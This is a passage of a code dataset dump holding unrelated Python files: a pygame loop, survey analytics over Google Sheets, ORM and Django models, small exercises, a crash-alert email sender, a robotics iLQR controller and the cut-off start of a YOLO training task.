############################################################\n self.floorGroup.draw(screen)\n self.leftWallGroup.draw(screen)\n self.midWallTopGroup.draw(screen)\n self.midWallBotGroup.draw(screen)\n self.rightWallGroup.draw(screen)\n self.bulletGroup.draw(screen)\n if self.mouseAngle < 180:\n self.wandGroup.draw(screen)\n self.playerGroup.draw(screen)\n self.PointerGroup.draw(screen)\n if self.mouseAngle > 180:\n self.wandGroup.draw(screen)\n pass\n\n def isKeyPressed(self, key):\n ''' return whether a specific key is being held '''\n return self._keys.get(key, False)\n\n def __init__(self, width=600, height=504, fps=50, title=\"112 Pygame Game\"):\n self.width = width\n self.height = height\n self.fps = fps\n self.title = title\n self.bgColor = (255, 255, 255)\n pygame.init()\n\n def run(self):\n\n clock = pygame.time.Clock()\n screen = pygame.display.set_mode((self.width, self.height))\n # set the title of the window\n pygame.display.set_caption(self.title)\n\n # stores all the keys currently being held down\n self._keys = dict()\n\n # call game-specific initialization\n self.init()\n playing = True\n while playing:\n time = clock.tick(self.fps)\n self.timerFired(time)\n for event in pygame.event.get():\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 1:\n self.mousePressed(*(event.pos))\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n self.mouseReleased(*(event.pos))\n elif (event.type == pygame.MOUSEMOTION and\n event.buttons == (0, 0, 0)):\n self.mouseMotion(*(event.pos))\n elif (event.type == pygame.MOUSEMOTION and\n event.buttons[0] == 1):\n self.mouseDrag(*(event.pos))\n elif event.type == pygame.KEYDOWN:\n self._keys[event.key] = True\n self.keyPressed(event.key, event.mod)\n elif event.type == pygame.KEYUP:\n self._keys[event.key] = False\n self.keyReleased(event.key, event.mod)\n elif event.type == pygame.QUIT:\n playing = False\n screen.fill(self.bgColor)\n self.redrawAll(screen)\n pygame.display.flip()\n\n pygame.quit()\n\n\ndef main():\n game = PygameGame()\n game.run()\n\nif __name__ == '__main__':\n main()","sub_path":"Prev. 
Versions/TP v.0.1.py","file_name":"TP v.0.1.py","file_ext":"py","file_size_in_byte":12544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"431823562","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 18 10:25:55 2019\n\n@author: FCRA\n\"\"\"\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\nclass Survey_Analytics():\n \n def __init__(self):\n q1 = input(\"What is the parent question?\")\n q2 = input(\"What is the child question?\")\n self.q_parent = int(q1) \n self.q_child = int(q2)\n \n def get_gsheet(self, name):\n scope = [\"https://spreadsheets.google.com/feeds\",\"https://www.googleapis.com/auth/spreadsheets\",\"https://www.googleapis.com/auth/drive.file\",\"https://www.googleapis.com/auth/drive\"]\n creds = ServiceAccountCredentials.from_json_keyfile_name(\"credentials.json\", scope)\n client = gspread.authorize(creds)\n sheet = client.open(name).sheet1\n \n #retreive dataFrame and drop row of questions\n df = pd.DataFrame(sheet.get_all_values())\n \n #formatting dataframe\n df = df.drop(index=0).reset_index().drop(columns=\"index\")\n #formatting long response to fit into plot\n df.loc[df[7] == \"It depends on the service (please elaborate below)\", 7] = \"Depends on service\" \n df.loc[df[12] == \"Depending on the services offered (please specify below)\", 12] = \"Depends on service\"\n \n #saving local copy of dataframe\n df.to_csv(\"modified.csv\") #, index=False, sep='\\t') \n print(\"...Dataframe <<\"+name+\">> has been retreived\")\n return df\n \n \n def transl_dutch_df(self, df):\n \n #positive, negative, I don't know\n for i in list([2, 3]):\n df.loc[df[i] == \"Sterk positief\", i] = \"Very positive\"\n df.loc[df[i] == \"Positief\", i] = \"Positive\"\n df.loc[df[i] == \"Negatief\", i] = \"Negative\"\n df.loc[df[i] == \"Sterk negatief\", i] = \"Very negative\"\n #I dont know\n df.loc[df[i] == \"Geen antwoord\", i] = \"I don't know\"\n \n #likely, unlikely\n df.loc[df[4] == \"Hoogst onwaarschijnlijk\", 4] = \"Very unlikely\"\n df.loc[df[4] == \"Onwaarschijnlijk\", 4] = \"Unlikely\"\n df.loc[df[4] == \"Waarschijnlijk\", 4] = \"Likely\"\n df.loc[df[4] == \"Hoogst waarschijnlijk\", 4] = \"Very likely\"\n \n #Comfrotable, unconfortable\n for i in list([5, 6, 7]):\n df.loc[df[i] == \"Zeer oncomfortabel\", i] = \"Very uncomfortable\"\n df.loc[df[i] == \"Oncomfortabel\", i] = \"Uncomfortable\"\n df.loc[df[i] == \"Comfortabel\", i] = \"Comfortable\"\n df.loc[df[i] == \"Zeer comfortabel\", i] = \"Very comfortable\"\n \n #Secure, insecure\n df.loc[df[9] == \"Zeer onveilig\", 9] = \"Very insecure\"\n df.loc[df[9] == \"Onveilig\", 9] = \"Insecure\"\n df.loc[df[9] == \"Veilig\", 9] = \"Secure\"\n df.loc[df[9] == \"Zeer veilig\", 9] = \"Very secure\"\n \n #Yes, No\n for i in list([11, 12]):\n df.loc[df[i] == \"Ja\", i] = \"Yes\"\n df.loc[df[i] == \"Nee\", i] = \"No\"\n df.loc[df[i] == \"Het hangt af van de service\", i] = \"Depends on service\"\n \n #q3\n df.loc[df[3] == \"Very positive\", 3] = \"I enjoy receiving personalised suggestions\"\n df.loc[df[3] == \"Positive\", 3] = \"Suggestions are sometimes helpful\"\n df.loc[df[3] == \"Negative\", 3] = \"I feel uncomfortable\"\n df.loc[df[3] == \"Very negative\", 3] = \"They shouldn’t provide such suggestions\"\n \n #q10\n df.loc[df[10] == \"Exclusief online interactie\", 10] = \"Exclusively online interaction\"\n df.loc[df[10] == 
\"Exclusief offline interactie\", 10] = \"Exclusively offline interaction\"\n df.loc[df[10] == \"Mix van online en offline interactie\", 10] = \"A mix of online and offline interaction\"\n df.loc[df[10] == \"Geen mening\", 10] = \"I don't know\"\n \n #\n print(\"...Dutch responses have been translated.\")\n return df\n \n \n def get_joined_dfs(self):\n df = self.get_gsheet(\"DSS x Digital Government Haarlem (Responses)\")\n \n df_dutch = self.get_gsheet(\"DSS x Digital Government Haarlem (Responses) Dutch\")\n df_trans = self.transl_dutch_df(df_dutch)\n df = pd.concat([df, df_trans]).reset_index().drop(columns=\"index\")\n \n #adding count column to dataset\n df[\"count\"] = 1 \n print(\"...Dutch responses have been joined to English Reponses.\")\n return df\n \n \n def order_choose(self, df, q):\n order_com = [\"Very comfortable\", \"Comfortable\", \"Uncomfortable\", \"Very uncomfortable\"] #\"I don't know\"]\n order_pos = [\"Very positive\", \"Positive\", \"Negative\", \"Very negative\"] # \"I don't know\"]\n order_sec = [\"Very secure\", \"Secure\", \"Insecure\", \"Very insecure\"] #, \"I don't know\"]\n order_yn = [\"Yes\", \"No\"]\n \n #df = self.get_joined_dfs()\n running = True\n while running:\n order_chosen = None\n for i in list(df[q]):\n for j in order_com:\n if i == j:\n order_chosen = order_com\n running = False\n \n for j in order_pos:\n if i == j:\n order_chosen = order_pos\n running = False\n \n for j in order_sec:\n if i == j:\n order_chosen = order_sec\n running = False\n \n for j in order_yn:\n if i == j:\n order_chosen = order_yn\n running = False\n \n if order_chosen == None:\n print(\"Something went wrong in choosing the order of the countplot labels :(\") \n running = False\n \n return order_chosen \n \n \n def save_pn_plots(self): \n \n q_parent = self.q_parent\n q_child = self.q_child\n df = self.get_joined_dfs()\n \n order_chosen_parent = self.order_choose(df, q_parent)\n \n print(\"...Dataframe is ready.\")\n \n fig = plt.figure()\n plt.title(\"Q\"+str(q_parent))\n \n sns.set(rc={'figure.figsize':(10,5)})\n a = sns.countplot(df[q_parent], order = order_chosen_parent, palette = \"GnBu_d\")\n a.tick_params(labelsize=15, rotation=0)\n \n fig.savefig(\"countplots/Q\"+str(q_parent)+\".png\")\n print(\"...Parent plot has been generated.\")\n \n #---within POSITIVE response of Q_parent\n dfp = df.loc[((df[q_parent] == \"Positive\") | (df[q_parent] == \"Very positive\") | (df[q_parent] == \"Very comfortable\") | (df[q_parent] == \"Comfortable\"))] \n #---within NEGATIVE response of Q_parent\n dfn = df.loc[((df[q_parent] == \"Negative\") | (df[q_parent] == \"Very negative\") | (df[q_parent] == \"Very uncomfortable\") | (df[q_parent] == \"Uncomfortable\"))]\n\n order_chosen_child = self.order_choose(df, q_child)\n\n #pos\n fig_pos = plt.figure()\n plt.title(\"P-Q\"+str(q_parent)+\" & Q\"+str(q_child))\n sns.set(rc={'figure.figsize':(10,5)})\n b = sns.countplot(dfp[q_child], order = order_chosen_child, palette = \"GnBu_d\")\n b.tick_params(labelsize=15, rotation=0)\n print(\"...Poitive child plot has been generated.\")\n \n #neg\n fig_neg = plt.figure()\n plt.title(\"N-Q\"+str(q_parent)+\" & Q\"+str(q_child))\n sns.set(rc={'figure.figsize':(10,5)})\n c = sns.countplot(dfn[q_child], order = order_chosen_child, palette = \"GnBu_d\")\n c.tick_params(labelsize=15, rotation=0)\n print(\"...Negative child plot has been generated.\")\n \n fig_pos.savefig(\"countplots/P-Q\"+str(q_parent)+\"&Q\"+str(q_child)+\".png\")\n 
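# The commented-out percent() stub just below hints at share-of-responses plots; a
# working sketch of that idea (the function name and labels are assumptions):
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt

def percent_plot(df, column):
    # value_counts(normalize=True) yields fractions of the column that sum to 1.
    shares = df[column].value_counts(normalize=True).mul(100)
    ax = shares.plot(kind="bar")
    ax.set_ylabel("% of responses")
    return ax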
fig_neg.savefig(\"countplots/N-Q\"+str(q_parent)+\"&Q\"+str(q_child)+\".png\")\n \n print(\"...End: 3 countplots have been saved to Project01/countplots.\")\n \n \n \n \n ## def percent(df, column):\n ## df[\"percent\"] = df[column].value_counts(normalize=True)\n ## return df\n \n \n \n \n \n \n","sub_path":"gsheet_tools.py","file_name":"gsheet_tools.py","file_ext":"py","file_size_in_byte":8258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"14588648","text":"#\n# Copyright (c) 2020 Cord Technologies Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom collections import OrderedDict\n\nfrom cord.orm import base_orm\n\n\nclass Model(base_orm.BaseORM):\n \"\"\"\n Model base ORM.\n\n ORM:\n\n \"\"\"\n\n DB_FIELDS = OrderedDict([])\n\n\nclass ModelInferenceParams(base_orm.BaseORM):\n \"\"\"\n Model inference parameters for running models trained via the platform.\n\n ORM:\n\n local_file_path,\n conf_thresh,\n iou_thresh,\n device\n detection_frame_range (optional)\n\n \"\"\"\n\n DB_FIELDS = OrderedDict([\n (\"files\", list),\n (\"conf_thresh\", float), # Confidence threshold\n (\"iou_thresh\", float), # Intersection over union threshold\n (\"device\", str),\n (\"detection_frame_range\", list)\n ])\n","sub_path":"cord/orm/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"39052398","text":"\"\"\"\nThis module contains my first Class, which makes simple operations.\n\"\"\"\n\n\nimport doctest\n\n\nclass Markets:\n \"\"\"\n This class makes creates objects - markets.\n\n >>> market_family_food.name\n 'Family Food'\n >>> print(market_family_food)\n Supermarket Family Food has an area of 80 m2 and has the following\\\n categories: Bread and Bakery, Dairy, Beverages.\n \"\"\"\n\n def __init__(self, name, area, categories):\n self.name = name\n self.area = area\n self.categories = categories\n\n def __str__(self):\n \"\"\"\n THis function converts inputed information to the complete santence.\n \"\"\"\n return \"Supermarket \" + self.name + \\\n \" has an area of \" + str(self.area) + \\\n \" m2 and has the following categories: \" + \\\n str(\", \".join(self.categories)) + \".\"\n\n\nif __name__ == \"__main__\":\n market_family_food = Markets(\n 'Family Food', 80, ['Bread and Bakery', 'Dairy', 'Beverages'])\n print(market_family_food.name)\n\n print(market_family_food.area)\n\n print(market_family_food.categories)\n\n print(market_family_food)\nprint(doctest.testmod())\n","sub_path":"labwork4/Name_Surname_markets.py","file_name":"Name_Surname_markets.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"501719308","text":"\nimport random\n\n# try/except\n\nclass MyException(Exception):\n def __init__(self, *args, **kwargs):\n # super(self, *args, **kwargs) # this will raise error as Exception is not new-style 
\n Exception.__init__(self, *args, **kwargs)\n\ntry:\n print(\"Are you happy?\")\n rndInt = random.randrange(3)\n if rndInt == 0:\n assert False, 'I am a little low'\n elif rndInt == 1:\n raise MyException('Something is wrong')\n else:\n raise Exception('just not good')\nexcept AssertionError as ae:\n print(f\"alert: {str(ae)}\")\n print('=> ok, drink a cup of coffee...')\nexcept MyException as myEx:\n print(f\"alert: {str(myEx)}\")\n print(\"=> come on cheer up!\")\nexcept Exception as ex:\n print(f\"alert: {str(ex)}\")\n print('=> no worries, you still got wifi')\nelse: # will run when there's no exception\n print(f\"no alert raised!\")\nfinally:\n print(\"===> we'll be fine\")\n\n\n","sub_path":"test_exception.py","file_name":"test_exception.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"21548459","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: CodeJZY\n@license: (C) Copyright 2019, Node Supply Chain Manager Corporation Limited.\n@contact: 634799086@qq.com\n@file: 最大子序和.py\n@time: 2019/12/10 20:10\n@desc:\n'''\n# def find_max(arr):\n# if len(arr) == 1:\n# return arr,arr[0]\n# # remainder\n# next_result = find_max(arr[1:])\n# return ([arr[0]],arr[0]) if arr[0] > arr[0]+next_result[1] else ([arr[0]]+next_result[0],arr[0]+next_result[1])\n# def find_arr(nums):\n# results = nums[:]\n# # all results\n# for i,item in enumerate(nums):\n# results.append(find_max(nums[i:]))\n# results = list(sorted(results,key=lambda data:data[1]))[-1]\n# return results\n# print(find_arr([1,2,3,4,5]))\n\nfrom collections import defaultdict\nclass Solution(object):\n def majorityElement(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n result = defaultdict(int)\n aim = len(nums)//2\n for i,num in enumerate(nums):\n print(num)\n result[num] += 1\n if result[num] > aim:\n return num\nprint(Solution().majorityElement([3,2,3]))","sub_path":"力扣/最大子序和.py","file_name":"最大子序和.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"422273266","text":"import os\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\n\n\ndef SendMail(ImgFileName):\n img_data = open(ImgFileName, 'rb').read()\n msg = MIMEMultipart()\n msg['Subject'] = 'Crash Alert'\n msg['From'] = 'sample@gmail.com.cc'\n msg['To'] = 'sample@gmail.com.cc'\n\n text = MIMEText(\"Vehicle Crash Detected. 
Send HELP\")\n msg.attach(text)\n image = MIMEImage(img_data, name=os.path.basename(ImgFileName))\n msg.attach(image)\n\n s = smtplib.SMTP('smtp.gmail.com', 587)\n s.ehlo()\n s.starttls()\n s.ehlo()\n s.login(\"sample_sender@gmail.com\", \"sample_password\")\n s.sendmail(\"sample_sender@gmail.com\", \"sample_receiver@gmail.com\", msg.as_string())\n s.quit()","sub_path":"image_email_car.py","file_name":"image_email_car.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"212880935","text":"from django.db import models\n\n\nclass ElectionDay(models.Model):\n \"\"\"\n A day on which one or many elections can be held.\n \"\"\"\n uid = models.CharField(\n max_length=500,\n primary_key=True,\n editable=False,\n blank=True\n )\n\n slug = models.SlugField(\n blank=True, max_length=255, unique=True, editable=False\n )\n\n date = models.DateField(unique=True)\n cycle = models.ForeignKey(\n 'ElectionCycle', related_name='elections_days',\n on_delete=models.PROTECT)\n\n def __str__(self):\n return self.uid\n\n def save(self, *args, **kwargs):\n \"\"\"\n **uid**: :code:`{cycle.uid}_date:{date}`\n \"\"\"\n self.uid = '{}_date:{}'.format(\n self.cycle.uid,\n self.date\n )\n self.slug = '{}'.format(self.date)\n super(ElectionDay, self).save(*args, **kwargs)\n\n def special_election_datestring(self):\n \"\"\"\n Formatted date string used in URL for special elections.\n \"\"\"\n return self.date.strftime('%b-%d').lower()\n","sub_path":"election/models/election_day.py","file_name":"election_day.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"616232404","text":"\n\nimport rospy\nimport numpy as np\nfrom std_msgs.msg import Float32MultiArray\nfrom Model import Model\nfrom . import PDController\nfrom sensor_msgs.msg import JointState\nfrom . 
import ControllerBase\nfrom GaitAnaylsisToolkit.LearningTools.Models import ModelBase\nimport rbdl\nimport copy\nimport time\n\n\nclass MPController(ControllerBase.BaseController):\n\n def __init__(self, model, runner):\n \"\"\"\n\n :param model:\n :param runner:\n \"\"\"\n self._runner = runner\n self.expData = self._runner.get_expData()\n\n self.max_steps = 0\n self.step = 0\n super(MPController, self).__init__(model)\n self.rbdl_model = self._model._model\n self.initialize()\n self.u = np.array([0, 0, 0, 0, 0, 0, 0])\n self.K2, self.tau, self.J_ = self.run_iLQR()\n self._x = self._runner.get_start()\n self._dx = np.zeros(len(self._x)).reshape((-1, 1))\n self._ddx = np.zeros(len(self._x)).reshape((-1, 1))\n\n self._kp = 50.0\n self._kc = 10.0\n Kp = np.zeros((7, 7))\n Kd = np.zeros((7, 7))\n\n Kp_hip = 100.0\n Kd_hip = 0.5\n\n Kp_knee = 125.0\n Kd_knee = 1.0\n\n Kp_ankle = 100.0\n Kd_ankle = 0.4\n\n Kp[0, 0] = Kp_hip\n Kd[0, 0] = Kd_hip\n Kp[1, 1] = Kp_knee\n Kd[1, 1] = Kd_knee\n Kp[2, 2] = Kp_ankle\n Kd[2, 2] = Kd_ankle\n\n Kp[3, 3] = Kp_hip\n Kd[3, 3] = Kd_hip\n Kp[4, 4] = Kp_knee\n Kd[4, 4] = Kd_knee\n Kp[5, 5] = Kp_ankle\n Kd[5, 5] = Kd_ankle\n\n self.pdController = PDController.PDController(model, Kp, Kd)\n\n def initialize(self):\n count = 0\n self.u = []\n self.K = []\n A_ = []\n b_ = []\n J = 0\n self.max_steps = self._runner.get_length()\n P = self._runner._data[\"P\"]\n start = self._runner.get_start()\n q = np.array([q[0] for q in start])\n qd = np.zeros(self.rbdl_model.qdot_size)\n y = np.concatenate((q, qd))\n tau = []\n\n while count < self._runner.get_length():\n self._runner.step()\n self.K.append(self._runner.K)\n u_raw = np.array(self._runner.ddx)\n x_raw = np.array(self._runner.x)\n xd_raw = np.array(self._runner.dx)\n tau.append(u_raw)\n u = np.array([q[0] for q in u_raw])\n x = np.array([q[0] for q in x_raw])\n xd = np.array([q[0] for q in xd_raw])\n y = np.concatenate((x, xd))\n #y2 = Model.runge_integrator(self.rbdl_model, y, 0.01, u)\n A, b = Model.finite_differences(self.rbdl_model, y, u, h=0.01)\n J += np.dot(np.dot(y.reshape((-1, 1)).T, (P[count])), y.reshape((-1, 1)))\n A_.append(A)\n b_.append(b)\n count += 1\n\n self.A = A_\n self.b = b_\n self.J = J\n\n def run_iLQR(self):\n A = self.A\n b = self.b\n eps = 1.0\n J = self.J\n print(J)\n while eps > 0.001:\n\n P, K = self.back_pass(A, b)\n A, b, J_, tau = self.forward_pass(K, P)\n eps = abs(J-J_)/J\n J = J_\n\n return K, tau, J_\n\n def forward_pass(self, K, P):\n count = 0\n h = 0.01\n A_ = []\n b_ = []\n x = self._runner.get_start()\n v0 = np.zeros(len(x)).reshape((-1, 1))\n J = 0\n y = np.concatenate((x, v0))\n tau = []\n\n while count < self.max_steps:\n # add ut here\n u = K[count].dot(np.vstack((self.expData[:, count].reshape((-1,1)), v0)) - y).flatten()\n # u = np.zeros(self.rbdl_model.qdot_size)\n y = Model.runge_integrator(self.rbdl_model, y.flatten(), h, u)\n A, b = Model.finite_differences(self.rbdl_model, y, u)\n A_.append(A)\n b_.append(b)\n J += np.dot(np.dot(y.reshape((-1, 1)).T, (P[count])), y.reshape((-1, 1)))\n tau.append(u)\n y = np.array([ [q] for q in y])\n count += 1\n\n return A_, b_, J, tau\n\n\n def back_pass(self, A, b):\n # need to get cost\n expSigma = self._runner._data[\"expSigma\"]\n ric = solve_riccati_mat(expSigma, A, b)\n P = ric[\"P\"]\n K = ric[\"K\"]\n return P, K\n\n def calc_tau(self, q=None, qd=None, qdd=None, other=None):\n \"\"\"\n\n :param q:\n :param qd:\n :param qdd:\n :return:\n \"\"\"\n # t = time.process_time()\n # self.K2_, self.tau_, self.J_ = 
self.run_iLQR()\n # elapsed_time = time.process_time() - t\n # print(elapsed_time)\n\n aq = np.zeros(7)\n if self.step == int(other[0]):\n v0 = np.zeros(len(self._x)).reshape((-1, 1))\n x_ = np.append(self._x, self._dx).reshape((-1, 1))\n #x_ = np.append(q[0:6], qd[0:6]).reshape((-1, 1))\n\n #K = np.append(np.eye(6) * self._kp, np.eye(6) * self._kc, 1)\n #self.u = K.dot(np.vstack((self.expData[:, self.step].reshape((-1, 1)), v0)) - x_)\n self.u = self.K2[self.step].dot(np.vstack((self.expData[:, self.step].reshape((-1, 1)), v0)) - x_)\n\n self._dx = self._dx + self.u * 0.01\n self._x = self._x + self._dx * 0.01\n self.step += 1\n self.u = np.append(self.u, [0.0])\n\n\n e = np.append(self._x, [0.0]) - self._model.q\n ed = np.append(self._dx, [0.0]) - self._model.qd\n aq = self.pdController.calc_tau(e, ed)\n self.tau = self.u #self._model.calculate_dynamics(qdd)\n return self.tau\n\n\ndef solve_riccati_mat(expSigma, A=None, B=None, dt=0.01, reg=1e-5):\n ric = {}\n size = expSigma[0].shape[0]\n if A is None:\n Ad = np.kron([[0, 1],[0, 0]], np.eye(size))*dt + np.eye(2*size)\n else:\n Ad = A\n if B is None:\n Bd = np.kron([[0], [1]], np.eye(size)) * dt\n else:\n Bd = B\n\n Q = np.zeros((size*2, size*2))\n R = np.eye(size)*reg\n P = [np.zeros((size*2, size*2))] * len(expSigma)\n P[-1][:size, :size] = np.linalg.pinv(expSigma[-1])\n K = [np.zeros((size*2, size*2))] * len(expSigma)\n for ii in range(len(expSigma)-2, -1, -1):\n Q[:size, :size] = np.linalg.pinv(expSigma[ii])\n B = P[ii + 1].dot(Bd[ii])\n C = np.linalg.pinv(np.dot(Bd[ii].T.dot(P[ii + 1]), Bd[ii]) + R)\n D = Bd[ii].T.dot(P[ii + 1])\n F = np.dot(np.dot(Ad[ii].T, B.dot(C).dot(D) - P[ii + 1]), Ad[ii])\n P[ii] = Q - F\n\n size = expSigma[0].shape[0]\n for i in range(len(expSigma)):\n v = np.linalg.inv(np.dot(np.dot(Bd[i].T, P[i]), Bd[i]) + R)\n K[i] = np.dot(np.dot(v.dot(Bd[i].T), P[i]), Ad[i])\n\n ric[\"Ad\"] = Ad\n ric[\"Bd\"] = Bd\n ric[\"R\"] = R\n ric[\"P\"] = P\n ric[\"K\"] = K\n return ric","sub_path":"Controller/MPController.py","file_name":"MPController.py","file_ext":"py","file_size_in_byte":6749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"427737939","text":"# Copyright 2023 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Contains classes used to train Yolo.\"\"\"\n\nimport collections\nfrom typing import Optional\n\nfrom absl import logging\nimport tensorflow as tf\n\nfrom official.common import dataset_fn\nfrom official.core import base_task\nfrom official.core import config_definitions\nfrom official.core import input_reader\nfrom official.core import task_factory\nfrom official.modeling import performance\nfrom official.projects.yolo import optimization\nfrom official.projects.yolo.configs import yolo as exp_cfg\nfrom official.projects.yolo.dataloaders import tf_example_decoder\nfrom official.projects.yolo.dataloaders import yolo_input\nfrom official.projects.yolo.modeling import factory\nfrom official.projects.yolo.ops import kmeans_anchors\nfrom official.projects.yolo.ops import mosaic\nfrom official.projects.yolo.ops import preprocessing_ops\nfrom official.projects.yolo.tasks import task_utils\nfrom official.vision.dataloaders import tfds_factory\nfrom official.vision.dataloaders import tf_example_label_map_decoder\nfrom official.vision.evaluation import coco_evaluator\nfrom official.vision.ops import box_ops\n\nOptimizationConfig = optimization.OptimizationConfig\nRuntimeConfig = config_definitions.RuntimeConfig\n\n\n@task_factory.register_task_cls(exp_cfg.YoloTask)\nclass YoloTask(base_task.Task):\n \"\"\"A single-replica view of training procedure.\n\n YOLO task provides artifacts for training/evaluation procedures, including\n loading/iterating over Datasets, initializing the model, calculating the loss,\n post-processing, and customized metrics with reduction.\n \"\"\"\n\n def __init__(self, params, logging_dir: Optional[str] = None):\n super().__init__(params, logging_dir)\n self.coco_metric = None\n self._loss_fn = None\n self._model = None\n self._coco_91_to_80 = False\n self._metrics = []\n\n # globally set the random seed\n preprocessing_ops.set_random_seeds(seed=params.seed)\n\n if self.task_config.model.anchor_boxes.generate_anchors:\n self.generate_anchors()\n return\n\n def generate_anchors(self):\n \"\"\"Generate Anchor boxes for an arbitrary object detection dataset.\"\"\"\n input_size = self.task_config.model.input_size\n anchor_cfg = self.task_config.model.anchor_boxes\n backbone = self.task_config.model.backbone.get()\n\n dataset = self.task_config.train_data\n decoder = self._get_data_decoder(dataset)\n\n num_anchors = backbone.max_level - backbone.min_level + 1\n num_anchors *= anchor_cfg.anchors_per_scale\n\n gbs = dataset.global_batch_size\n dataset.global_batch_size = 1\n box_reader = kmeans_anchors.BoxGenInputReader(\n dataset,\n dataset_fn=dataset_fn.pick_dataset_fn(\n self.task_config.train_data.file_type),\n decoder_fn=decoder.decode)\n\n boxes = box_reader.read(\n k=num_anchors,\n anchors_per_scale=anchor_cfg.anchors_per_scale,\n image_resolution=input_size,\n scaling_mode=anchor_cfg.scaling_mode,\n box_generation_mode=anchor_cfg.box_generation_mode,\n num_samples=anchor_cfg.num_samples)\n\n 
dataset.global_batch_size = gbs\n\n with open('anchors.txt', 'w') as f:\n f.write(f'input resolution: {input_size} \\n boxes: \\n {boxes}')\n logging.info('INFO: boxes will be saved to anchors.txt, make sure to save '\n 'them and update the boxes field in your yaml config file.')\n\n anchor_cfg.set_boxes(boxes)\n return boxes\n\n def build_model(self):\n \"\"\"Build an instance of Yolo.\"\"\"\n\n model_base_cfg = self.task_config.model\n l2_weight_decay = self.task_config.weight_decay / 2.0\n\n input_size = model_base_cfg.input_size.copy()\n input_specs = tf.keras.layers.InputSpec(shape=[None] + input_size)\n l2_regularizer = (\n tf.keras.regularizers.l2(l2_weight_decay) if l2_weight_decay else None)\n model, losses = factory.build_yolo(\n input_specs, model_base_cfg, l2_regularizer)\n model.build(input_specs.shape)\n model.summary(print_fn=logging.info)\n\n # save for later usage within the task.\n self._loss_fn = losses\n self._model = model\n return model\n\n def _get_data_decoder(self, params):\n \"\"\"Get a decoder object to decode the dataset.\"\"\"\n if params.tfds_name:\n decoder = tfds_factory.get_detection_decoder(params.tfds_name)\n else:\n decoder_cfg = params.decoder.get()\n if params.decoder.type == 'simple_decoder':\n self._coco_91_to_80 = decoder_cfg.coco91_to_80\n decoder = tf_example_decoder.TfExampleDecoder(\n coco91_to_80=decoder_cfg.coco91_to_80,\n regenerate_source_id=decoder_cfg.regenerate_source_id)\n elif params.decoder.type == 'label_map_decoder':\n decoder = tf_example_label_map_decoder.TfExampleDecoderLabelMap(\n label_map=decoder_cfg.label_map,\n regenerate_source_id=decoder_cfg.regenerate_source_id)\n else:\n raise ValueError('Unknown decoder type: {}!'.format(\n params.decoder.type))\n return decoder\n\n def build_inputs(self, params, input_context=None):\n \"\"\"Build input dataset.\"\"\"\n model = self.task_config.model\n\n # get anchor boxes dict based on the model's min and max level\n backbone = model.backbone.get()\n anchor_dict, level_limits = model.anchor_boxes.get(backbone.min_level,\n backbone.max_level)\n\n params.seed = self.task_config.seed\n # set shared parameters between mosaic and yolo_input\n base_config = dict(\n letter_box=params.parser.letter_box,\n aug_rand_translate=params.parser.aug_rand_translate,\n aug_rand_angle=params.parser.aug_rand_angle,\n aug_rand_perspective=params.parser.aug_rand_perspective,\n area_thresh=params.parser.area_thresh,\n random_flip=params.parser.random_flip,\n seed=params.seed,\n )\n\n # get the decoder\n decoder = self._get_data_decoder(params)\n\n # init Mosaic\n sample_fn = mosaic.Mosaic(\n output_size=model.input_size,\n mosaic_frequency=params.parser.mosaic.mosaic_frequency,\n mixup_frequency=params.parser.mosaic.mixup_frequency,\n jitter=params.parser.mosaic.jitter,\n mosaic_center=params.parser.mosaic.mosaic_center,\n mosaic_crop_mode=params.parser.mosaic.mosaic_crop_mode,\n aug_scale_min=params.parser.mosaic.aug_scale_min,\n aug_scale_max=params.parser.mosaic.aug_scale_max,\n **base_config)\n\n # init Parser\n parser = yolo_input.Parser(\n output_size=model.input_size,\n anchors=anchor_dict,\n use_tie_breaker=params.parser.use_tie_breaker,\n jitter=params.parser.jitter,\n aug_scale_min=params.parser.aug_scale_min,\n aug_scale_max=params.parser.aug_scale_max,\n 